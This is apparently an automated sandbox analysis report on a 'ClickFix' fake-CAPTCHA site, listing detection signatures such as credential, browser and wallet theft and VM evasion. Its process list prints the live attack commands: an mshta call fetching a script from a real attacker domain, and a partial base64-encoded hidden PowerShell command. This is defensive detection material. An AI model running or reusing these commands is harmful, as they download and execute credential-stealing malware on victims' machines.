Edit tour
Windows
Analysis Report
https://escooterzone.com/play.html
Overview
Detection
CAPTCHA Scam ClickFix
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Antivirus / Scanner detection for submitted sample
Detect drive by download via clipboard copy & paste
Sigma detected: Powershell Download and Execute IEX
Yara detected CAPTCHA Scam ClickFix
AI detected suspicious Javascript
Bypasses PowerShell execution policy
Encrypted powershell cmdline option found
Phishing site or detected (based on various text indicators)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sigma detected: PowerShell Download and Execution Cradles
Sigma detected: Suspicious Encoded PowerShell Command Line
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Suspicious PowerShell Encoded Command Patterns
Sigma detected: Suspicious PowerShell Parameter Substring
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Yara detected Costura Assembly Loader
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Searches for user specific document files
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: PowerShell Download Pattern
Sigma detected: PowerShell Web Download
Sigma detected: Suspicious Execution of Powershell with Base64
Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation
Sigma detected: Usage Of Web Request Commands And Cmdlets
Stores files to the Windows start menu directory
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Classification
- System is w10x64_ra
- chrome.exe (PID: 5764 cmdline:
"C:\Progra m Files\Go ogle\Chrom e\Applicat ion\chrome .exe" --st art-maximi zed "about :blank" MD5: 83395EAB5B03DEA9720F8D7AC0D15CAA) - chrome.exe (PID: 5128 cmdline:
"C:\Progra m Files\Go ogle\Chrom e\Applicat ion\chrome .exe" --ty pe=utility --utility -sub-type= network.mo jom.Networ kService - -lang=en-U S --servic e-sandbox- type=none --mojo-pla tform-chan nel-handle =2044 --fi eld-trial- handle=193 6,i,334966 4962166437 789,839539 4203860028 808,262144 --disable -features= Optimizati onGuideMod elDownload ing,Optimi zationHint s,Optimiza tionHintsF etching,Op timization TargetPred iction /pr efetch:8 MD5: 83395EAB5B03DEA9720F8D7AC0D15CAA)
- chrome.exe (PID: 6556 cmdline:
"C:\Progra m Files\Go ogle\Chrom e\Applicat ion\chrome .exe" "htt ps://escoo terzone.co m/play.htm l" MD5: 83395EAB5B03DEA9720F8D7AC0D15CAA)
- svchost.exe (PID: 6164 cmdline:
C:\Windows \System32\ svchost.ex e -k netsv cs -p -s B ITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
- mshta.exe (PID: 6700 cmdline:
"C:\Window s\system32 \mshta.exe " https:// agiledeals .shop/s6.p df # ? ''I am not a robot - re CAPTCHA Ve rification ID: 2165 MD5: 0B4340ED812DC82CE636C00FA5C9BEF2) - powershell.exe (PID: 6260 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -w 1 -Enc JABuAE0AcQ A1AEwAaQBP AGIAUABYAE gAVwBGAEgA bABkAGsAOQ BQAFMAMQBP AEcAeQBSAD QAMwBJAGMA dwByAFgAWg BkAE8ATQBi AEYATgBLAF QAUQAgAD0A IAAkAGYAQQ BMAHMARQAN AAoAJAB6AE YAUQBQAGEA cQBzAHcANg B6AHUAMgBl AGgANQBKAG MATgBIAFoA aABsAHkAbw BjAFoAaABX AFoAMQBqAG sANABiAEsA UQBjAHQAaw BtAGEAWABp AGwAQwB6AD IAcABzAEwA TABqAEwAeg B1AGMAawBi AFQAdAB5AE UARQBWAHIA SAB5AG0AMg BjAGgARQBC AHUAUQA3AG MAeQBkAE4A IAA9ACAAJA BUAFIAVQBl AA0ACgAkAG sATQBJAGIA dwBJAFMAOA BUAHEAMwA2 ADYAMABrAG EAbgAyAEMA WQBGAE0AYw BkAFcAZQBO AEIAVwAxAH cAWQBWAHUA egBvAEMAYg BaADYANgB5 AHIAbgBXAG UAdQB3ADkA TQBEAEkAdw BEAGcAZQBT AEsAZAA1AH AAWQAxAEcA WQBpAEgAVw BnAEUAVwBM AHkAUQBSAD gAZAAyAEoA bwA3AFQAaw BNAFEAYwBN ADMAawAzAG 8ARQBSADcA aABzAFoATg BOAHMAOABP ADMATgBDAG IAMwBBAFAA TgBqADQATQ BsAEYAUwBl AGwAdwBNAH QAUwBpAHoA QgBYAGkAUQ BwAFAAYwBW AGsAeAB0AE gAUQBZAEMA VQBDAFcAMg BTAEkAdwBI AFAARwBsAF kAcABLAHQA dQBHAGQASg BjAEsAYQBY ADYANgA2AG 4AZwByAFMA OAA2AEQAdg BFAEQAZwAw AGUARABHAH MAcQBSAEgA eABkAGcAbQ A2AE4ARQBx AE8AawBjAD YARwA3AEcA RABRAEQARg B2AHUAcABC AEcAcQB2AD QAagA1AEUA bABwAHkAUA B2ADAAcQBj AE4ANwBaAD UAZwB1AHcA ZQBMAEQAVQ B1AFUAcgBQ AHEAbAAgAD 0AIAAkAG4A VQBMAEwADQ AKACQAbQBk AEEATQBZAG 0AVQBFAGIA YgBwAHgAQg BXAFkAQQBh AHMAWgBtAE 4AUwBXADcA TwBMAEoAQQ ByAGUAUABI AFgASABUAF QAUQA1AHMA NgBNAHEAcQ BuAHcAdwBF ADAAcABlAF cARwBlAFoA TQBvAE4AdA BKADMARgBS ADcAUwB4AH UAWQBjAHEA cwBkAGoAcw BiAGIAbQBr AGkAeABQAH oAZwBmAGoA UwBuAEoAOQ BBAEYAVwBF AFkASwBMAE UAWQBZAHIA TABCAEMAZQ BkAFgANABk AEsAbgBJAF oARgB3AHcA YgBoAEEARA BWAHMATQBP AGIAbAB1AF gAOABSAFkA RQBJAGEATA BPAHEATQBD AFAASAB3AE QAdQBZAHgA VABPADQAdA AyAEgAbQBs AHoARgB5AG MATQBtAEgA MQA4AGMARw B6AEoAWgBn AEkANQBzAH gAUwBuAHkA ZQBmADYAbg B5AHAAdABL AGUAdgA1AE EAWAA1AFIA dwBCADQAZA BrAHEARQBJ AE0AZgBRAF cAMwB0AEcA QwBSAFYATQ BPAHAARQA0 AEcAdABpAE EAeQBtAEIA NgBmADMAYw BkAHIANwBC AE0AUQBQAE cAaQBtAFkA YgBkAFIAbQ BQAFYANQBB AFIAWQBoAG IAUwBnADcA egBvAEsAVA B0AE4AZwBJ AEkARQBJAE gAbgBjAFoA VgAyADAANA BzAE4AVQBS AGQAYgBOAD kAYwBXAFcA UQBLAHUATQ BwAGoAcQBt AGgAeQBtAE cAYwBRAHcA MABDADcAdQ B1AFQAUQBy AEcAMAAxAE YAZgAyAFgA egAgAD0AIg BEAGUAZgBs AGEAIgAgAC sAIAAiAHQA ZQBTAHQAcg BlAGEAbQAi ADsAJABkAD EATwBCAHgA TAAxADcAVQ AxADQANABW AFEAbABpAD kAZAA5AFEA TwBMADcANQ B6AFQAMAAz AHgASABJAE wAYgBrAHoA ZABnADkAWA A1AEEAWABj AEUAMQB4AD AAUAB1ADgA VQBRADkAVA BiAG0ARQBW ADkAYgBUAG EAWABGAGMA TwA4ADIAeA BVADcAbAB3 AG4AVgBTAH MAUQAyAHMA OABFAGgAZA BnAEQAaQBa AGsATwA3AF MAZwB6ADAA TwBSAE4Aeg BTAHMAWgA3 AEEAagBCAF QAWgBJAGQA OABiAFEAOA BCADUAUQA2 AE8AcwBSAG wAZQA2AGQA SABRAGsAWg BwAEwAeQBx AHIAcABpAH UATQBtAFgA UQBSAFcAWQ BGAGwAOABF AG8AbABJAF cAUQB0ADUA cABnAE0Aag A2AFkAdQBw AFIAYwBEAD kAeAA2AFMA